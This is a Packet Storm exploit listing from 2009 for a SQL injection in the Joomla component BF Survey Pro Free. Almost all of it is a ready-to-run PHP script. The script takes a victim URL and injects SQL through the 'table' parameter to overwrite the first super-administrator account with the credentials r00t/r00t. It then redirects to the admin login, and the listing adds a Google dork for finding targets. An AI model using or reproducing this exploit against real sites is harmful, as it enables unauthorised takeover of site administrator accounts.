Joomla BF Survey Pro Free SQL Injection

2009-09-10T00:00:00
ID PACKETSTORM:81099
Type packetstorm
Reporter jdc
Modified 2009-09-10T00:00:00

Description

                                        
                                            `<?php  
echo '<h2>Joomla Component BF Survey Pro Free SQL Injection Exploit</h2>';  
echo '<h4>jdc 2009</h4>';  
echo '<p>Google dork: inurl:com_bfsurvey_profree</p>';  
ini_set( "memory_limit", "128M" );  
ini_set( "max_execution_time", 0 );  
set_time_limit( 0 );  
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );  
$vulnerableFile = "http://".$_GET['url']."/index.php";  
$url = $vulnerableFile;  
$data = array();  
$data['option'] = 'com_bfsurvey_profree';  
$data['task'] = 'updateOnePage';  
$data['table'] = "jos_users set username=CHAR(".sqlChar( 'r00t' )."), password=CHAR(".sqlChar( md5('r00t' ) )."), email=CHAR(".sqlChar( 'x' ).") where gid=25 limit 1 -- '";  
$output = getData();  
die( '<script>alert("Now log in as r00t/r00t!");location.href="http://'.$_GET['url'].'/administrator/index.php";</script>' );  
function shutUp( $buffer ) { return false; }  
function sqlChar( $str ) { return implode( ',', array_map( 'ord', str_split( $str ) ) ); }  
function getData()  
{  
global $data, $url;  
ob_start( "shutUp" );  
$ch = curl_init();  
curl_setopt( $ch, CURL_TIMEOUT, 120 );  
curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );  
curl_setopt( $ch, CURLOPT_URL, $url );  
if( count( $data ) > 0 )  
{  
curl_setopt( $ch, CURLOPT_POST, count( $data ) );  
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );  
}  
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );  
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );  
$result = curl_exec( $ch );  
curl_close( $ch );  
$return = ob_get_contents();  
ob_end_clean();  
return $return;  
}  
?>  
  
`